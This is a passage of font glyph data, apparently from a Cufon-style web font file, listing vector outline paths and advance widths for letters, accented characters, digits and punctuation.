,-4,69,-41r13,0r0,97r-13,0v-1,-36,-26,-47,-69,-42v4,48,-19,120,43,108","w":235},{"d":"103,-303v-13,-12,5,-33,22,-23r56,54r-5,7v-24,-13,-54,-21,-73,-38xm134,-255v77,0,120,52,120,131v0,77,-44,130,-120,130v-76,0,-120,-52,-120,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"103,-254v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24xm136,-58v12,0,18,10,18,22v-3,28,-31,41,-60,41v-46,0,-76,-26,-76,-73v-1,-47,33,-73,77,-78r0,-38r17,0r0,66v-34,5,-61,14,-61,54v0,44,31,67,67,48v-6,-19,-6,-42,18,-42","w":172},{"d":"49,-194v1,-28,-22,-40,-45,-43r0,-12r71,0r141,190v-4,-55,11,-131,-11,-168v-5,-3,-25,-9,-33,-10r0,-12r101,0r0,12v-16,3,-38,4,-38,25v0,66,-1,144,-2,214r-16,0r-151,-204r0,129v1,32,1,53,28,57v8,2,14,4,17,4r0,12r-103,0r0,-12v15,-4,38,-6,39,-24v5,-44,1,-109,2,-158","w":276},{"d":"43,-135v1,-20,-22,-23,-39,-26r0,-11v23,1,52,-6,72,-1v-6,100,29,242,-71,251v-32,3,-44,-37,-15,-40v17,-2,22,16,28,25v25,-4,25,-33,25,-68r0,-130xm56,-266v14,0,22,11,22,22v1,13,-9,25,-22,25v-12,0,-23,-12,-23,-23v0,-12,10,-24,23,-24","w":105},{"d":"148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53","w":181},{"d":"199,-15v27,0,37,-15,47,-34r12,8v-16,53,-107,60,-134,13v-20,40,-110,49,-110,-11v0,-54,62,-56,99,-70v1,-30,-2,-56,-31,-56v-10,0,-21,4,-25,8v4,19,5,39,-18,39v-11,0,-18,-10,-17,-20v4,-45,93,-54,116,-19v10,-11,29,-21,49,-21v48,1,68,31,67,81r-109,0v0,48,13,81,54,82xm219,-111v-1,-27,-5,-54,-34,-54v-26,-1,-40,28,-40,54r74,0xm49,-44v-3,41,53,32,64,10r0,-60v-32,6,-61,15,-64,50","w":265},{"d":"171,-107v8,4,11,22,1,28r-62,58r-9,-7r45,-65r-45,-65r9,-7xm104,-107v8,3,11,23,1,28r-62,58r-9,-7r45,-65r-45,-65r9,-7","w":209},{"d":"56,-174v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24xm53,-44v41,0,34,64,12,81v-8,11,-21,19,-32,25r-8,-12v20,-12,35,-25,40,-50v-20,1,-34,-5,-34,-23v0,-10,10,-21,22,-21","w":112},{"d":"163,-40v-13,24,-40,44,-70,45v-52,2,-81,-39,-80,-92v1,-53,30,-89,82,-91v31,-1,58,15,58,45v0,27,-43,30,-40,6r4,-29v-4,-8,-13,-9,-23,-9v-66,0,-60,150,7,150v27,0,39,-14,50,-33","w":163},{"d":"88,-162v-2,34,24,42,54,45r0,23v-31,2,-57,10,-54,45v4,50,4,100,-43,105v-10,1,-21,3,-33,3r0,-15v46,5,47,-34,45,-79v-2,-44,23,-62,61,-68r0,-5v-53,-4,-66,-47,-61,-110v2,-30,-19,-37,-45,-38r0,-14v48,-1,80,14,78,63","w":154},{"d":"110,-272v32,-3,44,35,15,40v-16,-1,-22,-16,-29,-26v-26,5,-24,48,-25,85r45,0r0,17r-45,0r0,125v-1,17,17,19,33,19r0,12r-91,0r0,-12v15,1,25,-3,25,-18r0,-126r-34,0r0,-17r34,0v-4,-55,25,-95,72,-99","w":117},{"d":"51,-122v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24","w":100},{"d":"57,66v-15,17,-58,17,-58,-9v0,-34,40,-16,45,2v13,-7,33,-44,38,-60r-58,-142v-4,-10,-16,-17,-27,-19r0,-11r79,0r0,12v-10,0,-26,3,-18,15r42,103v12,-36,31,-63,41,-106v-1,-6,-16,-12,-23,-13r0,-11r64,0v4,20,-23,14,-26,31r-62,147v-12,26,-22,44,-37,61","w":177},{"d":"279,-133v6,-35,52,-105,-13,-104r0,-12r90,0r0,12v-53,10,-52,80,-66,125r-36,115r-16,0r-63,-192r-65,192r-16,0r-65,-226v-5,-8,-18,-13,-30,-14r0,-12r102,0r0,12v-16,2,-38,-1,-31,19r45,157r62,-185r18,0r62,189v13,-44,16,-42,22,-76","w":351},{"d":"152,-159v-54,4,-127,-18,-126,39r-10,0r0,-69r165,0r0,12r-125,241r-22,0","w":180},{"d":"60,-254v13,0,25,12,25,24v0,13,-12,24,-25,24v-13,0,-24,-12,-24,-24v0,-12,11,-24,24,-24xm67,-174r16,156v0,13,-9,24,-23,24v-14,0,-23,-11,-22,-24r15,-156r14,0","w":119},{"d":"169,-197v20,-26,22,-40,-14,-40r0,-12r93,0r0,12v-44,1,-56,37,-75,63r-29,39r77,109v9,11,18,13,35,14r0,12r-117,0r0,-12v19,-1,41,-2,29,-21v-15,-25,-32,-50,-47,-74v-14,21,-49,65,-55,83v3,11,12,11,29,12r0,12r-93,0r0,-12v49,-7,50,-35,78,-68v19,-22,17,-23,31,-42r-71,-102v-6,-8,-22,-12,-35,-13r0,-12r115,0r0,12v-15,2,-41,0,-28,21r43,67","w":255},{"d":"177,-224v-2,-13,-20,-11,-33,-13r0,-12r87,0r0,12v-36,5,-47,39,-63,64v-23,37,-40,68,-40,136v0,21,23,22,40,25r0,12r-117,0r0,-12v16,-2,42,-1,40,-23v-2,-33,4,-66,-12,-87v-29,-38,-32,-103,-87,-115r0,-12r107,0r0,12v-21,1,-40,1,-29,19r51,93v16,-28,47,-71,56,-99","w":221},{"d":"127,-238v19,1,22,-11,28,-24r10,4v-5,39,-55,56,-87,28v-20,-11,-31,8,-37,21r-10,-5v8,-19,18,-41,44,-42v26,-1,31,17,52,18xm98,-178v50,-1,86,38,84,90v-2,55,-31,93,-87,93v-53,0,-82,-37,-83,-91v-1,-52,35,-92,86,-92xm98,-8v63,0,67,-157,0,-157v-38,0,-48,36,-49,76v0,43,10,81,49,81","w":194},{"d":"283,-35v-2,19,18,21,34,23r0,12r-110,0r0,-12v17,-2,39,-2,39,-23r0,-182r-3,0r-85,213r-8,0r-81,-217r-3,0r0,149v-3,40,11,57,43,60r0,12r-101,0r0,-12v33,-2,41,-16,41,-58r0,-128v2,-28,-16,-37,-39,-39r0,-12r85,0r71,187r70,-187r81,0r0,12v-15,2,-34,2,-34,22r0,180","w":333},{"d":"105,-15v26,0,37,-12,49,-33r13,7v-14,25,-37,46,-72,46v-55,0,-82,-37,-82,-93v0,-51,28,-90,79,-90v51,0,72,33,70,86r-114,0v0,44,14,77,57,77xm128,-107v-1,-29,-6,-58,-36,-58v-29,1,-43,26,-44,58r80,0","w":174},{"d":"56,-174v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24xm53,-44v41,0,34,64,12,81v-8,11,-21,19,-32,25r-8,-12v20,-12,35,-25,40,-50v-20,1,-34,-5,-34,-23v0,-10,10,-21,22,-21","w":112},{"d":"134,-255v77,0,120,52,120,131v0,66,-34,104,-82,123v-1,37,39,60,77,47r0,14v-50,19,-120,3,-119,-54v-74,-6,-116,-54,-116,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"142,-14v40,0,59,-26,71,-55r14,6v-18,43,-44,69,-98,69v-62,0,-97,-43,-107,-99r-22,0r6,-17r15,0v0,-10,-2,-23,0,-31r-21,0r6,-17r17,0v9,-73,101,-125,171,-79v4,-7,8,-15,22,-12r1,89r-14,0v-8,-46,-42,-100,-97,-72v-23,13,-39,40,-42,74r69,0r-6,17r-64,0v0,10,-2,22,0,31r52,0r-6,17r-45,0v8,43,30,79,78,79"},{"d":"198,-88r-163,84r0,-24r135,-70r-135,-71r0,-24r163,85r0,20"},{"d":"49,-44v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24","w":97},{"d":"38,-232v-2,-21,26,-32,39,-17v4,5,6,10,6,17r-16,156r-14,0xm60,-44v13,0,25,12,25,24v0,13,-12,24,-25,24v-13,0,-24,-12,-24,-24v0,-12,11,-24,24,-24","w":119},{"d":"283,-31v0,16,13,18,27,19r0,12r-85,0r0,-12v15,1,26,-3,25,-18v-4,-47,17,-124,-29,-127v-23,-1,-36,12,-44,26r0,100v0,15,11,18,25,19r0,12r-82,0r0,-12v15,1,25,-3,24,-18v-4,-47,17,-124,-29,-127v-21,-1,-37,14,-44,26r0,99v-1,15,12,20,26,20r0,12r-84,0r0,-12v15,1,26,-3,25,-18r0,-107v0,-17,-13,-21,-28,-23r0,-12v19,1,44,-6,60,-1v1,8,-3,21,2,25v17,-33,92,-43,104,1v14,-15,30,-31,60,-31v64,-3,47,86,47,147","w":317},{"d":"134,-255v77,0,120,52,120,131v0,77,-44,130,-120,130v-76,0,-120,-52,-120,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"163,-303v18,0,22,-11,27,-24r11,4v-5,39,-55,56,-87,28v-20,-11,-32,8,-37,21r-10,-4v8,-19,18,-42,44,-43v25,-1,32,18,52,18xm134,-255v77,0,120,52,120,131v0,77,-44,130,-120,130v-76,0,-120,-52,-120,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"127,-249v78,4,129,44,129,126v0,81,-56,123,-136,123r-103,0r0,-12v17,0,35,-3,34,-21r0,-180v2,-19,-17,-22,-33,-24r0,-12r109,0xm126,-14v63,0,87,-44,87,-109v0,-75,-42,-121,-125,-111r0,191v0,24,14,29,38,29","w":269},{"d":"123,54r-93,0r0,-321r93,0r0,16r-62,0r0,289r62,0r0,16","w":135},{"d":"104,-213v1,-20,-20,-22,-37,-24r0,-12r110,0r0,12v-17,1,-35,2,-35,22r0,148v-3,43,-30,72,-76,73v-37,1,-64,-23,-64,-59v0,-34,47,-43,47,-9v0,18,-13,26,-18,40v6,8,17,15,33,15v37,-1,40,-35,40,-74r0,-132","w":186},{"d":"156,-110v-29,2,-22,-29,-16,-46v-4,-6,-16,-10,-26,-10r0,151v31,1,45,-15,59,-34r10,8v-13,22,-38,41,-69,44r0,50r-14,0r0,-50v-47,-3,-75,-41,-75,-91v0,-46,34,-85,75,-90r0,-46r14,0r0,46v32,0,60,16,61,45v0,13,-6,23,-19,23xm100,-165v-54,13,-53,135,0,147r0,-147","w":199},{"d":"141,-132v31,15,55,28,55,66v0,44,-43,72,-92,72v-47,0,-86,-26,-86,-70v0,-36,24,-51,55,-63v-25,-14,-45,-30,-45,-62v0,-39,41,-67,83,-67v42,0,76,25,76,64v0,29,-21,49,-46,60xm129,-138v37,-20,34,-104,-21,-104v-39,0,-61,52,-30,76v10,9,26,18,51,28xm108,-8v47,0,71,-58,35,-84v-15,-10,-38,-21,-58,-29v-49,19,-40,113,23,113","w":214},{"d":"118,-160v40,0,73,38,71,79v-2,52,-35,86,-85,87v-102,2,-105,-150,-49,-210v26,-28,59,-46,101,-52r3,16v-59,10,-92,47,-102,104v17,-15,34,-23,61,-24xm104,-8v32,0,47,-31,47,-68v0,-35,-16,-63,-48,-63v-27,0,-48,10,-48,43v0,44,13,88,49,88","w":203},{"d":"100,-194v100,0,105,152,48,208v-25,24,-57,46,-100,51r-4,-16v59,-10,93,-45,103,-102v-44,46,-132,17,-132,-55v0,-47,38,-86,85,-86xm101,-50v26,0,47,-9,47,-43v0,-44,-13,-88,-49,-88v-31,0,-46,32,-46,68v0,35,16,63,48,63","w":203},{"d":"160,75r-23,0r-121,-343r23,0","w":168},{"d":"182,-88v6,75,-81,119,-137,75r-22,27r-11,-7r24,-29v-48,-49,-18,-156,62,-156v23,0,38,6,51,17r19,-25r10,8r-20,25v14,15,23,38,24,65xm98,-165v-53,0,-57,74,-44,121r80,-99v-7,-13,-17,-22,-36,-22xm98,-8v50,-3,54,-75,42,-123r-80,100v8,13,18,24,38,23","w":194},{"d":"195,-35r-16,16r-63,-64r-64,64r-15,-16r64,-63r-64,-64r15,-15r64,63r63,-64r16,16r-64,64"},{"d":"173,-160v-23,0,-21,-20,-16,-38v-6,-10,-20,-16,-37,-16r0,82v32,15,74,21,74,68v0,39,-36,65,-74,67r0,50r-15,0r0,-50v-41,1,-77,-21,-78,-56v0,-12,5,-22,18,-21v27,-1,18,26,12,43v7,13,26,21,48,20r0,-88v-31,-12,-71,-23,-71,-68v0,-34,35,-62,71,-61r0,-40r15,0r0,40v37,1,69,16,69,49v0,11,-3,19,-16,19xm105,-214v-44,-3,-55,63,-11,73r11,5r0,-78xm120,-11v26,-1,41,-14,41,-39v-1,-27,-18,-38,-41,-46r0,85","w":219},{"d":"192,-130v-3,-11,-16,-12,-30,-16r0,-12r94,0r0,12v-54,2,-52,61,-79,91v17,21,40,42,76,43r0,12r-72,0r-27,-30v-17,18,-35,36,-69,36v-43,0,-72,-23,-72,-67v0,-41,23,-55,55,-77v-15,-22,-30,-33,-30,-63v0,-35,25,-54,61,-54v33,0,55,17,55,49v0,34,-24,49,-49,63v20,29,41,51,63,77v12,-20,23,-39,24,-64xm97,-153v36,-9,51,-82,4,-87v-46,8,-28,64,-4,87xm75,-127v-41,22,-32,112,24,109v20,0,37,-10,46,-22","w":255},{"d":"204,-131r-43,0r-13,44r46,0r0,22r-52,0r-19,65r-19,0r18,-65r-38,0r-19,65r-19,0r19,-65r-38,0r0,-22r44,0r13,-44r-46,0r0,-22r52,0r18,-63r20,0r-19,63r38,0r19,-63r19,0r-18,63r37,0r0,22xm142,-131r-39,0r-13,45r39,0"},{"d":"19,-249v-2,-17,25,-28,34,-14v16,24,-8,63,-9,93r-11,0","w":77},{"d":"90,-196v25,1,58,-24,65,3v-6,26,-43,1,-65,3v11,18,30,26,37,47v0,6,-8,12,-14,12v-21,-9,-14,-32,-28,-56v-14,22,-6,48,-28,56v-6,0,-14,-5,-13,-12v5,-21,25,-28,36,-47v-23,-3,-59,23,-65,-3v7,-27,41,-1,65,-3v-12,-16,-29,-27,-36,-48v-1,-6,8,-12,13,-12v21,5,16,39,28,57v13,-20,8,-49,28,-57v5,1,14,6,14,12v-6,20,-23,26,-37,48","w":169},{"d":"86,-303v-11,-14,6,-32,23,-23r56,54r-5,7v-24,-13,-54,-22,-74,-38xm51,-28v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r82,-210r14,0r89,226v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58xm149,-102r-38,-97r-37,97r75,0","w":241},{"d":"232,-282r-233,0r0,-18r233,0r0,18"},{"d":"120,-82r-105,0r0,-27r105,0r0,27","w":134},{"d":"129,-14v52,0,62,-32,76,-60r12,0r-5,74r-195,0r0,-12v16,-2,34,-3,34,-22r0,-179v1,-18,-18,-21,-34,-24r0,-12r106,0r0,12v-16,2,-35,3,-35,23r0,167v-3,31,11,33,41,33","w":217},{"d":"81,65v29,6,40,-28,10,-28v-4,0,-7,-1,-10,-1r0,-32v-42,-6,-69,-41,-68,-91v1,-53,30,-89,82,-91v31,-1,58,15,58,45v0,27,-43,30,-40,6r4,-29v-4,-8,-13,-9,-23,-9v-66,0,-60,150,7,150v27,0,39,-14,50,-33r12,8v-13,22,-37,44,-68,45r0,12v39,-6,54,42,19,55v-13,5,-30,7,-49,6r0,-13r16,0","w":163},{"d":"84,17v39,-6,54,42,19,55v-13,5,-30,7,-49,6r0,-13v20,0,44,3,45,-15v0,-12,-18,-13,-29,-14r0,-39r14,0r0,20","w":180},{"d":"253,-249r-130,249r-24,0r130,-249r24,0xm89,-114v-1,16,20,14,34,15r0,13r-100,0r0,-13v17,0,36,3,36,-14r0,-111r-36,0r0,-13v23,2,44,-6,54,-17r13,0xm351,-121v-3,63,-70,62,-101,96r109,0r0,25r-132,0v-2,-67,88,-51,91,-122v2,-33,-41,-45,-59,-23v5,16,7,34,-15,34v-12,0,-16,-7,-16,-17v4,-55,126,-56,123,7","w":377},{"d":"211,-190v1,43,-27,57,-61,67v29,35,51,79,87,106v5,3,17,4,23,5r0,12r-67,0r-79,-113r-26,0r0,79v-2,20,18,20,35,22r0,12r-106,0r0,-12v16,-2,34,-3,34,-22r0,-180v2,-19,-19,-21,-34,-23r0,-12v79,5,193,-23,194,59xm88,-128v47,5,80,-15,80,-58v0,-42,-34,-53,-80,-49r0,107","w":252},{"d":"180,-12v5,82,-156,108,-169,26v-2,-12,6,-23,18,-23v25,0,24,26,17,44v32,31,104,10,95,-47v2,-41,-26,-54,-71,-50r0,-20v43,4,61,-13,61,-54v0,-47,-53,-56,-76,-27v5,17,11,49,-17,46v-12,0,-18,-11,-18,-22v0,-37,36,-54,78,-55v43,0,69,20,72,57v3,39,-27,49,-52,63v35,5,59,21,62,62","w":198},{"d":"54,-104v1,75,14,134,69,147r0,15v-108,-5,-126,-194,-75,-278v18,-28,43,-45,75,-49r0,14v-54,13,-70,73,-69,151","w":135},{"d":"149,-317v12,-23,50,-2,31,15v-16,15,-48,24,-72,37r-6,-7xm145,-14v92,0,67,-114,64,-197v-1,-21,-23,-23,-41,-26r0,-12r101,0r0,12v-66,-2,-35,103,-40,164v-5,52,-39,79,-90,79v-52,0,-93,-23,-93,-72r0,-147v2,-19,-18,-22,-33,-24r0,-12r104,0r0,12v-16,2,-35,4,-34,22v7,81,-30,201,62,201","w":272},{"d":"176,-271r-8,6r-49,-37r-48,37r-9,-6v16,-18,30,-39,48,-55v7,-4,23,-2,25,5xm131,-14v54,9,72,-26,83,-59r13,0r-5,73r-207,0r0,-12v17,-1,36,-3,36,-22r0,-179v2,-20,-20,-22,-36,-24r0,-12r193,0r0,60r-13,0v-7,-26,-28,-53,-68,-47r-39,0r0,100v42,4,69,-4,69,-41r13,0r0,97r-13,0v-1,-36,-26,-47,-69,-42v4,48,-19,120,43,108","w":235},{"d":"71,-32v0,15,12,20,26,20r0,12r-84,0r0,-12v15,1,25,-3,25,-18r0,-107v1,-18,-14,-21,-30,-23r0,-12v20,1,46,-6,63,-1r0,141xm52,-266v14,0,22,11,23,22v0,13,-10,25,-23,25v-12,0,-22,-11,-22,-23v0,-12,9,-24,22,-24","w":105},{"d":"111,-194v62,0,92,40,92,100v0,62,-32,100,-93,100v-61,0,-92,-39,-92,-100v0,-61,32,-100,93,-100xm110,-6v74,0,73,-178,1,-176v-40,1,-55,40,-54,88v0,45,14,88,53,88","w":220},{"d":"118,-178v50,2,73,39,75,91v3,69,-67,112,-125,80r0,52v-1,19,18,20,35,21r0,12r-97,0r0,-12v16,0,30,-2,29,-19r0,-184v-2,-15,-12,-23,-29,-23r0,-12v20,1,45,-6,61,-1v1,6,-2,17,2,20v10,-12,29,-26,49,-25xm108,-8v67,0,65,-149,-2,-151v-19,-1,-30,10,-38,20r0,102v6,16,19,29,40,29","w":205},{"d":"227,-63v-17,44,-46,69,-100,69v-72,0,-109,-53,-113,-128v-5,-102,96,-164,180,-115v4,-7,8,-15,22,-12r1,89r-14,0v-10,-37,-23,-80,-68,-80v-58,0,-79,53,-79,115v0,61,25,111,84,111v40,0,61,-25,73,-55"},{"d":"79,-255v36,0,60,29,60,65v0,40,-23,65,-60,65v-37,0,-60,-26,-60,-65v0,-37,24,-65,60,-65xm79,-138v41,-2,41,-102,0,-104v-40,0,-43,104,0,104xm216,-124v37,0,59,28,59,65v0,40,-23,65,-60,65v-37,0,-59,-25,-59,-65v0,-37,23,-65,60,-65xm215,-7v41,0,42,-103,1,-104v-43,0,-42,102,-1,104xm263,-250r-207,250r-24,0r207,-250r24,0","w":294},{"d":"176,-31v0,15,10,19,25,19r0,12r-85,0r0,-12v16,1,28,-3,27,-18v-3,-48,16,-127,-30,-127v-22,0,-37,12,-45,26r0,100v-1,15,12,19,26,19r0,12r-85,0r0,-12v16,1,27,-3,26,-18r0,-201v1,-19,-16,-26,-34,-26r0,-11v21,1,50,-8,67,-1r0,120v16,-15,29,-28,59,-29v65,-1,47,85,49,147","w":209},{"d":"105,-114v-1,16,20,14,34,15r0,13r-100,0r0,-13v17,0,36,3,36,-14r0,-111r-36,0r0,-13v23,2,44,-6,54,-17r13,0","w":180},{"d":"71,-32v0,15,12,20,26,20r0,12r-84,0r0,-12v15,1,25,-3,25,-18r0,-107v1,-18,-14,-21,-30,-23r0,-12v20,1,46,-6,63,-1r0,141xm53,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":105},{"d":"129,-152v0,-7,-15,-9,-22,-10r0,-11r76,0r0,11v-36,10,-55,32,-77,55v23,26,47,67,72,92v4,2,10,3,18,3r0,12r-52,0r-62,-87r-14,14v0,29,-7,65,26,61r0,12r-85,0r0,-12v16,1,27,-3,26,-18r0,-201v0,-18,-14,-27,-34,-26r0,-11v21,1,50,-8,67,-1r0,183v20,-22,43,-42,61,-66","w":192},{"d":"87,-274v24,0,46,15,45,39v0,24,-19,40,-45,39v-26,0,-45,-15,-46,-39v-1,-23,22,-39,46,-39xm87,-207v16,0,23,-12,23,-28v0,-16,-7,-28,-23,-28v-15,0,-24,13,-24,28v0,16,8,28,24,28xm148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53","w":181},{"d":"101,-303v-13,-12,5,-33,22,-23r56,54r-5,7v-24,-13,-54,-21,-73,-38xm145,-14v92,0,67,-114,64,-197v-1,-21,-23,-23,-41,-26r0,-12r101,0r0,12v-66,-2,-35,103,-40,164v-5,52,-39,79,-90,79v-52,0,-93,-23,-93,-72r0,-147v2,-19,-18,-22,-33,-24r0,-12r104,0r0,12v-16,2,-35,4,-34,22v7,81,-30,201,62,201","w":272},{"d":"57,66v-15,17,-58,17,-58,-9v0,-34,40,-16,45,2v13,-7,33,-44,38,-60r-58,-142v-4,-10,-16,-17,-27,-19r0,-11r79,0r0,12v-10,0,-26,3,-18,15r42,103v12,-36,31,-63,41,-106v-1,-6,-16,-12,-23,-13r0,-11r64,0v4,20,-23,14,-26,31r-62,147v-12,26,-22,44,-37,61xm97,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":177},{"d":"232,50r-233,0r0,-18r233,0r0,18"},{"d":"172,-35v0,15,10,21,26,20r0,12v-19,-1,-45,8,-59,1v-1,-7,2,-17,-1,-22v-13,15,-27,28,-57,28v-63,0,-48,-81,-48,-141v0,-17,-12,-21,-27,-23r0,-11v20,0,44,-6,61,-2r0,120v-6,51,60,43,72,13r0,-99v0,-18,-15,-21,-33,-21r0,-11v21,0,48,-6,66,-2r0,138","w":207},{"w":86},{"d":"149,-202r-9,5r-49,-48r-48,48r-8,-5v16,-22,29,-47,47,-67v7,-4,23,-2,25,5xm105,-15v26,0,37,-12,49,-33r13,7v-14,25,-37,46,-72,46v-55,0,-82,-37,-82,-93v0,-51,28,-90,79,-90v51,0,72,33,70,86r-114,0v0,44,14,77,57,77xm128,-107v-1,-29,-6,-58,-36,-58v-29,1,-43,26,-44,58r80,0","w":174},{"d":"51,-28v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r82,-210r14,0r89,226v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58xm149,-102r-38,-97r-37,97r75,0","w":241},{"d":"108,-269v12,0,19,10,19,20v0,23,-9,49,-14,79r-11,0r-14,-79v1,-11,7,-20,20,-20xm41,-269v12,0,19,10,19,20v0,23,-9,49,-14,79r-11,0r-14,-79v1,-11,7,-20,20,-20","w":148},{"d":"179,-31v0,15,11,18,25,19r0,12r-85,0r0,-12v16,1,28,-3,27,-18v-3,-48,16,-127,-30,-127v-22,0,-37,12,-45,26r0,100v-1,16,13,18,27,19r0,12r-85,0r0,-12v15,1,26,-3,25,-18r0,-107v0,-16,-11,-23,-27,-23r0,-12v19,0,44,-6,60,-1v1,7,-2,18,1,24v14,-15,29,-28,58,-29v67,-2,49,85,49,147","w":212},{"d":"68,-32v0,15,12,20,26,20r0,12r-85,0r0,-12v16,1,27,-3,26,-18r0,-200v2,-20,-17,-26,-35,-27r0,-11r66,-4v7,74,2,162,2,240","w":103},{"d":"204,-120r-177,0r0,-22r177,0r0,22xm204,-55r-177,0r0,-22r177,0r0,22"},{"d":"225,-134v8,-18,-2,-28,-20,-28r0,-11r66,0r0,11v-33,4,-36,44,-45,71r-30,92r-15,0r-47,-127r-46,127r-15,0r-48,-144v-3,-11,-15,-16,-26,-19r0,-11r77,0r0,12v-10,1,-25,3,-17,16r31,100r45,-125r17,0r45,123","w":265},{"d":"197,-4r-163,-84r0,-20r163,-85r0,24r-136,71r136,70r0,24"},{"d":"198,-140r-26,0r-56,-92r-57,92r-25,0r72,-116r20,0"},{"d":"120,-178v27,-3,36,49,7,50v-18,1,-23,-14,-18,-30v-16,2,-30,13,-38,26r0,101v-2,18,18,18,33,19r0,12r-91,0r0,-12v15,1,26,-3,25,-18r0,-107v-1,-15,-10,-23,-27,-23r0,-12v19,0,44,-6,60,-1v1,7,-2,18,1,24v11,-14,29,-27,48,-29","w":147},{"d":"200,-271r-9,6r-49,-37r-48,37r-9,-6v16,-18,30,-39,48,-55v7,-4,23,-2,25,5xm145,-14v92,0,67,-114,64,-197v-1,-21,-23,-23,-41,-26r0,-12r101,0r0,12v-66,-2,-35,103,-40,164v-5,52,-39,79,-90,79v-52,0,-93,-23,-93,-72r0,-147v2,-19,-18,-22,-33,-24r0,-12r104,0r0,12v-16,2,-35,4,-34,22v7,81,-30,201,62,201","w":272},{"d":"49,-14v52,4,91,0,90,-47r11,0r0,61r-140,0r0,-9r98,-150r-48,0v-23,0,-28,18,-33,39r-11,0r0,-53r133,0r0,7","w":159},{"d":"120,-82r-105,0r0,-27r105,0r0,27","w":134},{"d":"67,-59v-8,37,21,47,53,39r0,12v-30,16,-86,22,-86,-30r0,-118r-32,0r0,-17r32,0r0,-54r32,0r0,54r50,0r0,17r-49,0r0,97","w":124},{"d":"13,-87v0,-70,66,-111,126,-80r0,-60v2,-25,-18,-29,-41,-30r0,-11r71,-4r3,3r0,233v-1,17,12,22,30,21r0,12v-20,-1,-48,8,-63,1v-1,-5,2,-13,-1,-16v-46,49,-125,7,-125,-69xm100,-14v19,0,30,-10,39,-20r0,-101v-6,-16,-17,-30,-40,-30v-66,3,-70,150,1,151","w":206},{"d":"133,-317v12,-23,51,-3,32,15v-16,15,-49,24,-73,37r-5,-7xm131,-14v54,9,72,-26,83,-59r13,0r-5,73r-207,0r0,-12v17,-1,36,-3,36,-22r0,-179v2,-20,-20,-22,-36,-24r0,-12r193,0r0,60r-13,0v-7,-26,-28,-53,-68,-47r-39,0r0,100v42,4,69,-4,69,-41r13,0r0,97r-13,0v-1,-36,-26,-47,-69,-42v4,48,-19,120,43,108","w":235},{"d":"79,-255v47,0,76,26,76,72v0,46,-34,73,-78,78r0,39r-16,0r0,-67v35,-3,60,-15,60,-54v0,-43,-33,-66,-67,-47v7,17,6,44,-18,41v-11,-1,-17,-10,-17,-22v2,-28,30,-40,60,-40xm69,-44v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24","w":172},{"d":"183,-326v26,1,27,43,0,44v-11,0,-21,-10,-21,-22v0,-12,10,-22,21,-22xm104,-326v25,0,26,44,0,44v-11,0,-21,-10,-21,-22v0,-12,10,-22,21,-22xm145,-14v92,0,67,-114,64,-197v-1,-21,-23,-23,-41,-26r0,-12r101,0r0,12v-66,-2,-35,103,-40,164v-5,52,-39,79,-90,79v-52,0,-93,-23,-93,-72r0,-147v2,-19,-18,-22,-33,-24r0,-12r104,0r0,12v-16,2,-35,4,-34,22v7,81,-30,201,62,201","w":272},{"d":"45,-44v41,0,34,64,12,81v-8,11,-21,19,-32,25r-8,-12v20,-12,35,-25,40,-50v-20,1,-34,-5,-34,-23v0,-10,10,-21,22,-21","w":97},{"d":"98,-35v-1,45,-2,85,45,79r0,15v-48,0,-80,-14,-78,-64r2,-44v1,-34,-22,-44,-54,-45r0,-23v30,-3,56,-11,54,-45v-3,-49,-6,-101,43,-105v10,-1,21,-3,33,-3r0,14v-26,1,-46,8,-45,38v5,62,-7,106,-61,110r0,5v38,6,62,24,61,68","w":154},{"d":"160,-100v20,0,28,-16,35,-31r14,5v-11,23,-26,51,-60,52v-32,0,-48,-24,-78,-24v-20,0,-25,15,-34,31r-14,-5v10,-24,28,-52,60,-52v34,0,47,24,77,24"},{"d":"51,-213v2,-20,-20,-22,-36,-24r0,-12r196,0r0,62r-13,0v-8,-25,-26,-49,-68,-49r-42,0r0,101v41,3,72,-2,71,-41r14,0r0,98r-14,0v1,-38,-27,-